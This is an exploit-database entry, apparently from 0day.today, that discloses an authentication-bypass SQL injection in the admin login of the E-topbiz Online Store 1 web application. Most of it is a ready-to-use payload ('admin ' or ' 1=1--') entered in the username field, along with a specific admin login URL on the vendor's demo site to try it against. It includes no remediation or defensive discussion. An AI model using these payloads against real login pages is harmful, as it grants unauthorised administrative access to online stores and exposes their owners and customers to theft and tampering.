id: 4114
date: 11/07/2008
title: E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln
author: ZoRLu
cves: 

========================================================
E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln
========================================================


E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability

author: ZoRLu  

N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : (   ( bIktIm a.q )

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin 


for demo: 

http://e-topbiz.com/trafficdemos/store1/admin/login.php

username: admin ' or ' 1=1--

password: ZoRLu



#  0day.today [2023-03-24]  #